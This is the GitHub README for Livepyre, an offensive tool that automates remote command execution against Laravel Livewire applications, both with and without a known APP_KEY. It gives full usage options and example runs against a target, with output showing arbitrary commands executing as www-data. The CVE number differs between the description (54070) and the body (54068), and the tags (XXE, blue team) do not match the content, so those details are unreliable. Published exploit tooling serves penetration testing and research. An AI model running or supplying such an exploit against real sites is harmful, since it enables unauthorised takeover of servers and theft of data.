synacktiv/Livepyre

GitHub: synacktiv/Livepyre

An automated exploitation tool for the Laravel Livewire CVE-2025-54070 remote command execution vulnerability, supporting exploitation both with and without the APP_KEY.

Stars: 144 | Forks: 33

# Livepyre


A tool designed to exploit CVE-2025-54068, and to achieve remote command execution when the APP_KEY of a Livewire project is known.

Tool authors: `@_remsio_` `@_Worty`.

## Help

```
$ ./Livepyre.py -h
usage: Livepyre.py [-h] -u URL [-f FUNCTION] [-p PARAM] [-H HEADERS] [-P PROXY] [-a APP_KEY] [-d] [-F] [-c]

Livewire exploit tool

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target URL
  -f, --function FUNCTION
                        Function to execute (default: system)
  -p, --param PARAM     Param for function (default: id)
  -H, --headers HEADERS
                        Headers to add to the request (default None)
  -P, --proxy PROXY     Proxy URL for requests
  -a, --app-key APP_KEY
                        APP_KEY to sign snapshot
  -d, --debug           Enable debug output
  -F, --force           Force exploit even if version does not seems to be vulnerable
  -c, --check           Only check if the remote target is vulnerable (only revelant for the exploit without the APP_KEY)
```

## Usage

```
$ ./Livepyre.py -u https://target.com/
```

## Examples

```
# Without the APP_KEY, when an object type is present in the snapshot
$ ./Livepyre.py -u http://livewire.local/counter
[INFO] The remote livewire version is v3.6.2, the target is vulnerable.
[INFO] Found snapshot(s). Running exploit.
[INFO] Running exploit without APP_KEY.
[INFO] Found 1 snapshot(s) available.
[INFO] Found 2 possible param(s).
[INFO] Checking for param(s) with object type to avoid bruteforce.
[INFO] test is typed as an object, triggering RCE.
[INFO] Sending payload system('id') to livewire.
[INFO] Payload works, output:
uid=1337(sail) gid=33(www-data) groups=33(www-data)

# Without the APP_KEY, when no object type is present in the snapshot: falls back to bruteforce
$ ./Livepyre.py -u http://livewire.local/counter
[INFO] The remote livewire version is v3.6.2, the target is vulnerable.
[INFO] Found snapshot(s). Running exploit.
[INFO] Running exploit without APP_KEY.
[INFO] Found 1 snapshot(s) available.
[INFO] Found 1 possible param(s).
[INFO] Checking for param(s) with object type to avoid bruteforce.
[WARNING] No param with direct object type was found, attempting bruteforce.
[INFO] Trying to gain RCE with param count.
[INFO] Sending payload system('id') to livewire.
[INFO] Payload works, output:
uid=1337(sail) gid=33(www-data) groups=33(www-data)

# With the APP_KEY
$ ./Livepyre.py -u http://livewire.local/counter -a 'base64:CGhMqYXFMzbOe048WS6a0iG8f6bBcTLVbP36bqqrvuA='
[INFO] The remote livewire version is v3.6.2, the target is vulnerable.
[INFO] Found snapshot(s). Running exploit.
[INFO] Running exploit with APP_KEY.
[INFO] Found 1 snapshot(s) available.
[INFO] Sending payload system('id') to livewire.
[INFO] Payload works, output:
uid=1337(sail) gid=33(www-data) groups=33(www-data)
```

# License

This project is licensed under the MIT License - see the LICENSE file for details.
Tags: Web security, XXE attacks, blue team analysis, remote command execution, reverse engineering tools